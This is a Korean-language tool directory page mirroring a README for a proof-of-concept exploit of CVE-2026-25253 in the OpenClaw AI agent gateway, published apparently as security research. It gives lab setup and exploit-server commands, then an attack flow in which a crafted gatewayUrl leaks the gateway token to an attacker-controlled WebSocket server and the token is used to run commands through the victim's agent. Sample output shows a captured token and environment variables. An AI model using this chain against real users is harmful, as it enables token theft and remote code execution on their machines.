Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-25253 — OpenClaw의 CVE-2026-25253에 대한 개념 증명 익스플로잇: 조작된 gatewayUrl이 Control UI 게이트웨이 토큰을 유출하여 무단 게이트웨이 접근과 1-클릭 원격 코드 실행을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/yym8538/cve-2026-25253
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationWeb SecurityPenetration TestingAuthenticationRed TeamingRemote Access Tool
GitHubyym8538/cve-2026-25253

CVE-2026-25253

OpenClaw의 CVE-2026-25253에 대한 개념 증명 익스플로잇: 조작된 gatewayUrl이 Control UI 게이트웨이 토큰을 유출하여 무단 게이트웨이 접근과 1-클릭 원격 코드 실행을 가능하게 합니다.

141개월 전아직 검토되지 않음
저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-25253 OpenClaw 1-Click RCE

★ CVE-2026-25253 OpenClaw 1-Click 원격 코드 실행 PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

설명

CVE-2026-25253 : OpenClaw 인증 토큰 유출 취약점

description: OpenClaw(일명 clawdbot 또는 Moltbot)는 v2026.1.29 이전 버전에서 공격자가 조작된 gatewayUrl 쿼리 문자열 값을 Control UI에 제공하여 저장된 게이트웨이 인증 토큰을 유출할 수 있도록 허용합니다. Control UI는 검증이나 사용자 확인 없이 자동으로 WebSocket 연결을 설정합니다. 이는 권한 없는 게이트웨이 접근 및 1-클릭 원격 코드 실행으로 이어질 수 있습니다.

요구 사항

  • Docker (Windows에서는 Docker Desktop)
  • Python 3.x (공격 측)

파일

  • Dockerfile — OpenClaw 취약 환경 빌드
  • templates/ — 익스플로잇에서 사용하는 악성 웹 페이지
  • config.txt — 피해자 환경에서 사용하는 OpenClaw 구성
  • exploit.py — 익스플로잇 서버
  • requirements.txt — PoC 의존성

환경 설정

  1. Docker 이미지 빌드
docker build -t openclaw-vuln .
  1. 환경 실행 (Windows)
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. SSH 터널 생성
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • 비밀번호: openclawlab
  1. OpenClaw Control UI 접속 브라우저에서 다음 URL을 엽니다
http://127.0.0.1:18789/
  1. Gateway Token d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 입력
  2. Connect 클릭
  3. Config 탭 열기
  4. config.txt의 내용 붙여넣기
  5. API 키 필드를 본인의 OpenAI API 키로 교체
  6. 구성 저장
  7. 에이전트가 정상적으로 응답하는지 확인

개념 증명 (PoC)

  1. 의존성 설치 (공격 측)
pip3 install -r requirements.txt
  1. 익스플로잇 서버를 HTTPS로 노출
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • 생성된 포워딩 호스트명 복사
  1. 익스플로잇 서버 실행
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

예시:

python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. 공격 트리거
  1. 익스플로잇 서버가 노출하는 악성 페이지 열기
  2. 페이지와의 피해자 상호작용 시뮬레이션
  3. 브라우저에서 익스플로잇 흐름 트리거

공격 흐름

  1. 악성 URL이 피해자 Control UI의 gatewayUrl을 변경
  2. 브라우저가 공격자가 제어하는 WebSocket 엔드포인트에 자동으로 연결
  3. 게이트웨이 인증 토큰이 공격자에게 유출됨
  4. 악성 페이지가 탈취한 토큰을 사용하여 피해자의 로컬 OpenClaw 게이트웨이에 새로운 WebSocket 연결을 엽니다
  5. 에이전트를 통해 명령 실행 요청이 전송됨
  6. 실행 결과가 공격자 서버로 반환됨

예상 결과

  • 피해자 브라우저가 악성 WebSocket 흐름으로 리다이렉트됨
  • 게이트웨이 인증 토큰이 공격자에 의해 캡처됨
  • 공격자가 OpenClaw를 통해 명령 실행 요청을 보낼 수 있음
  • 명령 출력이 공격자 서버로 반환됨

샘플 출력

[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

참고 사항

  • 이 PoC는 OpenClaw 2026.1.24-1을 대상으로 합니다
  • 익스플로잇 체인은 Control UI의 취약한 gatewayUrl 처리에 의존합니다
  • 원격 피해자 접근을 위해서는 악성 페이지가 HTTPS로 제공되어야 합니다
  • 로컬 OpenClaw 게이트웨이는 피해자 브라우저를 브리지로 통해 도달됩니다

EQST 인사이트

저희는 매월 CVE 및 악성코드 분석을 게시합니다. 관심이 있으시면 아래 링크를 통해 저희 간행물을 확인해 주세요.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
도구 다운로드